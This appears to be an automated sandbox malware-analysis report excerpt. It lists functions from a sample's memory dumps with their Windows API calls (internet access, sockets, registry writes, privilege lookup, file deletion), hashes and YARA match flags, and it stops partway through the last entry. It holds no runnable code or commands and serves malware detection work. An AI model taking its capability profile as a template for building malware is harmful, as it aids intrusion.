Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 078a0ae3a5dfbf51d2c315a6d861c59cfd5c8ac3eaf532e96dc457e0830bcc9b
Instruction ID: adaf616967d147156f5089c6847d977ab610ebdd478499a475c969596134cfed
Opcode Fuzzy Hash: 078a0ae3a5dfbf51d2c315a6d861c59cfd5c8ac3eaf532e96dc457e0830bcc9b
Instruction Fuzzy Hash: 05113A6D13BE31DECF203E204D65AB7565ADB21350FF8450DE983561D6E29844B0A712

Uniqueness

Uniqueness Score: -1.00%

Function 002844F1, Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 29641ce21c957ae4f90a94fd84806bd184a01a5cc3633dff6a2568c28f1862f1
Instruction ID: 9663c69cd88b4869913d4dce069dfe04cc85ca2972b9fc50cc8ba120adcac507
Opcode Fuzzy Hash: 29641ce21c957ae4f90a94fd84806bd184a01a5cc3633dff6a2568c28f1862f1
Instruction Fuzzy Hash: B821E778276357DBFB34BD14CD91BFE23995F15350F608428AD0B960C1F3B99924A710

Uniqueness

Uniqueness Score: -1.00%

Function 00287869, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5e2850be3d2e8f6a891df17656e5e3028a134c4337341dc6ee5638c889d85d2a
Instruction ID: df4b8eec83d923f1a2d358b6136088c13044861b4e27ffccabde38d6ca6adff4
Opcode Fuzzy Hash: 5e2850be3d2e8f6a891df17656e5e3028a134c4337341dc6ee5638c889d85d2a
Instruction Fuzzy Hash: 4821A22C63F206CDDF257E20C41C7A826A2FF62311FB85246C80E465E1C3B4C8E5E742

Uniqueness

Uniqueness Score: -1.00%

Function 00282908, Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00282927

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 843f3620ba8a1f743b431ae7637e2a44fc4da9d5c87545bea35671e8b15ca8fb
Instruction ID: 4488727b6f94cce0ba8a8fa069ec05c9004a28f4af7b4b815c19c585e62b81ba
Opcode Fuzzy Hash: 843f3620ba8a1f743b431ae7637e2a44fc4da9d5c87545bea35671e8b15ca8fb
Instruction Fuzzy Hash: CA112B7C137303EFDB20BA44C989BAA3614EB16334F710352E927571D6C3A4D8E59B26

Uniqueness

Uniqueness Score: -1.00%

Function 007B21BA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 007B2225

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 1788c4359247f9a771b036d8ed333dc48007afbcaf56f177c3feb907aae51d4a
Instruction ID: c906c89103890daa440529dd1f6daa339eff26e9199152fc4b72e59b268b0597
Opcode Fuzzy Hash: 1788c4359247f9a771b036d8ed333dc48007afbcaf56f177c3feb907aae51d4a
Instruction Fuzzy Hash: E921AEB1501740AFE720DF65DC85BA6FBE8EF08310F04846AED498B282D775A805CA66

Uniqueness

Uniqueness Score: -1.00%

Function 007B1A5A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 007B1AC6

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 759907cdc6e09f5ea14d11dac474fccef1595abbd9c5f349373efa14120f5051
Instruction ID: d782359482cfc45edc94b43299c0bdfafa13f3faf2fcc938f8f36b2757c2b36d
Opcode Fuzzy Hash: 759907cdc6e09f5ea14d11dac474fccef1595abbd9c5f349373efa14120f5051
Instruction Fuzzy Hash: 4D21A171500700EFEB21DF55DC45F96FBE4EF08310F54846EE9858A652D375A904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B2D4A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2DBA

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 470570bd61d545d5758befc77e8d067f098703a37493db5437f435f47442065a
Instruction ID: dcb0a2cc31e827ca507d9c3b5158359f4ee431a539567a261e3e6bd152c807d0
Opcode Fuzzy Hash: 470570bd61d545d5758befc77e8d067f098703a37493db5437f435f47442065a
Instruction Fuzzy Hash: D311BE72500704EFEB21CF51DC84FA7FBE8EF08320F04896AFA459A542D674A9099BB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B22BA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 007B232E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: c8fe6457d3aa50eb8e54ddfacdcd03f3ff5bcf7ceb481055b15a041bc7d540e5
Instruction ID: 4a15e0bfeba2e670efd4825fc32b38761eadd7647c065fc8c39369cf63094c17
Opcode Fuzzy Hash: c8fe6457d3aa50eb8e54ddfacdcd03f3ff5bcf7ceb481055b15a041bc7d540e5
Instruction Fuzzy Hash: B321AE72500704EFEB21DF55DC85F96FBE8EF08310F04845AE9898B252D779A905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B055C

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: eaf175c1d0858cf197b9cd694cb1389231e36163f50582e4282a56d6885631fb
Instruction ID: 1369e7eb6830b5afe1cd6ad908e07e50964efede08ad934f935b3d6dc1ddee26
Opcode Fuzzy Hash: eaf175c1d0858cf197b9cd694cb1389231e36163f50582e4282a56d6885631fb
Instruction Fuzzy Hash: 3711AC72100704AFEB30CE15DC84FA7FBE8EF04720F08855AE9468A642D664E914CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B0B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0C10

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a06716eadd506f59d29f536ae383cf5f2202856938519c421f64f57b77d851a3
Instruction ID: 868dedbde82ac8a45d9c3532650bf9ccb8a63dec613861fdae3edac100e88752
Opcode Fuzzy Hash: a06716eadd506f59d29f536ae383cf5f2202856938519c421f64f57b77d851a3
Instruction Fuzzy Hash: 861190B2600704EFEB209F15DC81FA7FBE8EF04750F04855AED459A641D774E945CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B2B5A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2BC1

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 2a864d3ffb5f262995910dbc50900b657de256b10fc346d7f08d8d88943cbc53
Instruction ID: 49c35bc20ffe260fdf16558e06d15d494cff670f0569da6ee07f5c2c9f6561db
Opcode Fuzzy Hash: 2a864d3ffb5f262995910dbc50900b657de256b10fc346d7f08d8d88943cbc53
Instruction Fuzzy Hash: D711BBB2100304EFEB20CF55DC84FA7FBE8EF04720F1484AAE9498A242D674A9058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B2726, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2785

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: afdd6119763ba6279055999499113a202f0737f82ca6c81339bd8289b7ba13fa
Instruction ID: 221ca94224f2db7f7d3f6f1ad93ff9dd1b443a94f083a79e49ff55e58221bd51
Opcode Fuzzy Hash: afdd6119763ba6279055999499113a202f0737f82ca6c81339bd8289b7ba13fa
Instruction Fuzzy Hash: 5711E272100300EFEB21CF65DC85FA6FBA8EF04720F14846AEE458A552C674A9058BB5

Uniqueness

Uniqueness Score: -1.00%

Function 007B12F8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 007B1362

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 633df61bb0d29c4b325c105c9776570b2e87d9016f63ad8ea5d6d97a4250f766
Instruction ID: dfffff4e66bfbf03d2d7cc6e8e36e42f58c0bbdfdc74e2a3369aa88a1348dfaa
Opcode Fuzzy Hash: 633df61bb0d29c4b325c105c9776570b2e87d9016f63ad8ea5d6d97a4250f766
Instruction Fuzzy Hash: CB1172726043809FD721CF25DC95B96BFE8EF55250F0884AAE985CB652E374E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B1006, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B105C

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: ad4fa9cabdb47264a469291522f5d0ba30705257c1fbe27b2c8099562b327968
Instruction ID: 7b9333ae4b07eec3315f50a9395a74892064cadd41d96e4111b3d214786a925c
Opcode Fuzzy Hash: ad4fa9cabdb47264a469291522f5d0ba30705257c1fbe27b2c8099562b327968
Instruction Fuzzy Hash: 51110271500340EFFB20DF25DC85BAAFB98EF44320F5484AAED09CB281D678A9448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B1724, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 007B1786

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 4c772a86837937b235092239220aed99fe14bcf4cfd8a920c5bb5ffcf72654e0
Instruction ID: 03c0672cb6452a16dcf75ae5dd2499a7b4c5ad86d0820be78fe1e87c2e7ae557
Opcode Fuzzy Hash: 4c772a86837937b235092239220aed99fe14bcf4cfd8a920c5bb5ffcf72654e0
Instruction Fuzzy Hash: 79118E755053849FD721CF65DC85B92FFE8EF06220F0884AAED89CB262D375A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0A51

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f4461277fa70c429de123c2c854a7858717d07b13ed9145b24408791cf2319b0
Instruction ID: 0210b094dcb27334ee63cbadd112b59d817cbd696d061e71da0a702372aa7213
Opcode Fuzzy Hash: f4461277fa70c429de123c2c854a7858717d07b13ed9145b24408791cf2319b0
Instruction Fuzzy Hash: 4A11E372500300EFEB21CF51DC85FA7FBE8EF04720F14C85AE9499A141C674A904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B10E2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,00000EA4), ref: 007B114B

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7335eb8e5bba5c95886d7c3f672e59ca11e3bc15bb4779076fa18f0731367a94
Instruction ID: 22f8250f24ea239a3e3f06742d81b788338d30a5c50d4e10acb47083f6566125
Opcode Fuzzy Hash: 7335eb8e5bba5c95886d7c3f672e59ca11e3bc15bb4779076fa18f0731367a94
Instruction Fuzzy Hash: D7112571600308EFF720DF19DC86BB6FB98DF05720F54C06AFE458A681D6B8B904CA62

Uniqueness

Uniqueness Score: -1.00%

Function 007B02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000EA4), ref: 007B0353

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 38a0fc03e54e242dbcfd4d9becb205001c030e7b33ec3b3bf863a151f47f6bf7
Instruction ID: 38398331bc5206c977f6f91742ed53c18cb1266f9797eb345ea1afb7139e4b33
Opcode Fuzzy Hash: 38a0fc03e54e242dbcfd4d9becb205001c030e7b33ec3b3bf863a151f47f6bf7
Instruction Fuzzy Hash: 3811C171100700EFFB319F11DC85FA6FBA8EF04710F14855AFE455A691C6B5A948CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0028450A, Relevance: 1.6, APIs: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: ff1452720bbd6c408aad623a564fae23aefc0b7f3930929787cba53620b578dd
Instruction ID: b56d2be593072df2d6ec494a78888c597cc5ac06d18584aa83323b8f96de4c57
Opcode Fuzzy Hash: ff1452720bbd6c408aad623a564fae23aefc0b7f3930929787cba53620b578dd
Instruction Fuzzy Hash: C811913827A397DBEB38BE15DD50BFE26A99F15350F604429AD0BDA0C0F3759520AB20

Uniqueness

Uniqueness Score: -1.00%

Function 007B118F, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,5C79B353,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 007B11F4

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7581321b7b1897c930294cee04bfb1c1896531bb3947aea4b1373de31eed62a5
Instruction ID: 92f8630a93ae6e7f8ff7d4e712ced7d7699b52556027785a0acf42d7a1868e5a
Opcode Fuzzy Hash: 7581321b7b1897c930294cee04bfb1c1896531bb3947aea4b1373de31eed62a5
Instruction Fuzzy Hash: 831190715093C09FD712CB65DC45B92BFB4EF46224F0984DBED888F153C279A849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B131A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 007B1362

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5406ce0b78b5885243a9e024c4e1063ff6e9bcf79ebde4a2dfd276963669f2b0
Instruction ID: f3ec4cf0cf889f247f503e16a10306f45d35f1343cbb4e3e31b7e611bfd4e68e
Opcode Fuzzy Hash: 5406ce0b78b5885243a9e024c4e1063ff6e9bcf79ebde4a2dfd276963669f2b0
Instruction Fuzzy Hash: 901182726002008FEB20CF25DC95B96FBD8EF14710F48846ADC49CB641E674E804CA61

Uniqueness

Uniqueness Score: -1.00%

Function 007B0AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 007B0B1E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 5406ce0b78b5885243a9e024c4e1063ff6e9bcf79ebde4a2dfd276963669f2b0
Instruction ID: d622eb6d0cf8c506ffd989e5c3743a566effc7361f8127ca55ffddd1b37861db
Opcode Fuzzy Hash: 5406ce0b78b5885243a9e024c4e1063ff6e9bcf79ebde4a2dfd276963669f2b0
Instruction Fuzzy Hash: F41165B56003049FEB60CF69DC85B97FBD8EF14715F1884AADD49CB642D674E804CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,5C79B353,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 007B079F

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 499ae88be83a4c7a03b0d2c90661629052c15aafac7102bbdba3009abe7beb98
Instruction ID: 5557abcac8bdd194ddfe1869f901f78fd864d662d5b19ad834781d07beb1f965
Opcode Fuzzy Hash: 499ae88be83a4c7a03b0d2c90661629052c15aafac7102bbdba3009abe7beb98
Instruction Fuzzy Hash: 7F1165756003409FEB50CF29D885B96FBD8EF05750F08C4AADC49CB641DA74E804CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0985

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5bf44c85f083dbac2d83d49efd18565b4d98f8cfb8ca9d6e7b90b91606165c33
Instruction ID: eb433b3a14701abf923c5e74b1b2d69d7424f51bd22d9abe50824dc21c4cdaa8
Opcode Fuzzy Hash: 5bf44c85f083dbac2d83d49efd18565b4d98f8cfb8ca9d6e7b90b91606165c33
Instruction Fuzzy Hash: 90019276500704EFF720DF15DC85BA7FB98DF45720F148096FE499B282D6B8B9448AB2

Uniqueness

Uniqueness Score: -1.00%

Function 002878CC, Relevance: 1.6, APIs: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 432ccffd81593edad1dae783d5e28aa87c83d3696ba30702d8d6d9baf2d4fad7
Instruction ID: 9d906d46c6a7326b2a1d1f278d030288dc1082fb92df5669f795ce3d0b87c2f7
Opcode Fuzzy Hash: 432ccffd81593edad1dae783d5e28aa87c83d3696ba30702d8d6d9baf2d4fad7
Instruction Fuzzy Hash: 5E012D2963F207CDDB25BE24C1587A832A2FF61355FB95246C80E4A5E0C3B8C8E5D742

Uniqueness

Uniqueness Score: -1.00%

Function 007B1746, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 007B1786

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: ee34c4be8bf218cf6a69fd843da8f46276c4ba6cf0953cdccfdaab2094a2986c
Instruction ID: c4e685592a90245035823fcbba2ece226702fb6e24edd7677216f82f51e3caba
Opcode Fuzzy Hash: ee34c4be8bf218cf6a69fd843da8f46276c4ba6cf0953cdccfdaab2094a2986c
Instruction Fuzzy Hash: E111AD75600200DFEB20CF65D884B96FBE4EF04720F9884AADD498B652D674E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B0CCA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 007B0D1A

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: c68cc5ba47f2b458518bc9b078c87af4592bd59f5b9915328fd34032ec1d4f04
Instruction ID: a969304d9f7247d10559ffa9d6d8e4fc2fdd4e97490af11e871dfe124447d22c
Opcode Fuzzy Hash: c68cc5ba47f2b458518bc9b078c87af4592bd59f5b9915328fd34032ec1d4f04
Instruction Fuzzy Hash: 89017571900600AFD310DF15DD45B66FBA4FF84660F14815ADD089B741D275B515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 007B05FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000EA4,?,?), ref: 007B064E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 2f67bb25b152959ade45f9f7a42c9288c608d6db95c85354dcfaafe98f6497ab
Instruction ID: 46845b05f555cb4ac47c69000d7ad76c2b908c9c03c2764dd2de8873043c1f8b
Opcode Fuzzy Hash: 2f67bb25b152959ade45f9f7a42c9288c608d6db95c85354dcfaafe98f6497ab
Instruction Fuzzy Hash: FB016271900601ABD310DF16DD86B26FBA4FF89B20F14815AED085B741D275F915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 007B19BE, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 007B1A0E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 33d89a01a32fa2e1dc3d8e9746fd17e08625c6e3b81e21aed0685a3ee9b0016b
Instruction ID: 4cad37e81d1791257684a6eaa14bd3d242268ee1f12b445b2667d6743d97cb17
Opcode Fuzzy Hash: 33d89a01a32fa2e1dc3d8e9746fd17e08625c6e3b81e21aed0685a3ee9b0016b
Instruction Fuzzy Hash: 8B01A271900600ABD310CF16DC82B26FBA4FF88B20F14811AED084B741D371F915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 0028587A, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00286BDF,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 00285947

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 63d418a5f7464954ebfc02cb5d6ce9c635786d20389d5864fc1764ef93d48e19
Instruction ID: 07e65f9229f08fd2f3acfcf79dd617c727e5953932c16be07cc576c995869ec0
Opcode Fuzzy Hash: 63d418a5f7464954ebfc02cb5d6ce9c635786d20389d5864fc1764ef93d48e19
Instruction Fuzzy Hash: 2AF0305C5BBD7BE6CE203A2468657BC12858B11334F749422F8578B0D7CA9489B66BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00285885, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00286BDF,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 00285947

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d76ac11a3c88a73ff308cddcbeed99ea6184c28aa92dc63868e6601188fc07ae
Instruction ID: b1286394fac674e75a3f3bb676115163a01d7690bdd1c247205286a15ea7f31d
Opcode Fuzzy Hash: d76ac11a3c88a73ff308cddcbeed99ea6184c28aa92dc63868e6601188fc07ae
Instruction Fuzzy Hash: 38F0A05C57BE3AEBCB203A2054553AC27844F02320F748413E893870D686984CF9A7C2

Uniqueness

Uniqueness Score: -1.00%

Function 002858A0, Relevance: 1.5, APIs: 1, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00286BDF,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 00285947

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d292924128dc54d65220ec4fa50736002e3c7c61ca8d4983b200a46ff10aee2d
Instruction ID: bd00a80232773ed16f1fbc214454fe502a112738dcb39719961d99ec9fd17c0f
Opcode Fuzzy Hash: d292924128dc54d65220ec4fa50736002e3c7c61ca8d4983b200a46ff10aee2d
Instruction Fuzzy Hash: CAE0E58C47BD3AEACE303B206840BBD12848F00330F648012F457430C689988DB59BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00287969, Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c792eefe0adf563a94d8a13690d8cf25c55d13ab7371f00cee5a38ee70e33fb8
Instruction ID: 1ecd770d34d09e93ef201bffcd4c004da7b5079f1d1e27a48aecfb6fd0977a76
Opcode Fuzzy Hash: c792eefe0adf563a94d8a13690d8cf25c55d13ab7371f00cee5a38ee70e33fb8
Instruction Fuzzy Hash: 9EE09A2937E2178C6F1ABE20C5A43E82322EEA2341BBC5606CC0ACA5E0D350D4A0A302

Uniqueness

Uniqueness Score: -1.00%

Function 00287951, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 59ea30f16ef3bba4fb76af42ae5da28cacdf8e88ee9f963dce5eba8aa112b62a
Instruction ID: 2271a002a3bdb5b72b6ebc1076e741a5c363c97d7a59ec21a62018e049b21b89
Opcode Fuzzy Hash: 59ea30f16ef3bba4fb76af42ae5da28cacdf8e88ee9f963dce5eba8aa112b62a
Instruction Fuzzy Hash: B4E0921C77F217CC6B197D24C5543F82322FE623407BC4246CC4B465E4D360C8A59302

Uniqueness

Uniqueness Score: -1.00%

Function 00287945, Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6b51ce510805435905ed07440e3165fbfc5c3781904527c8ac603a7893c85039
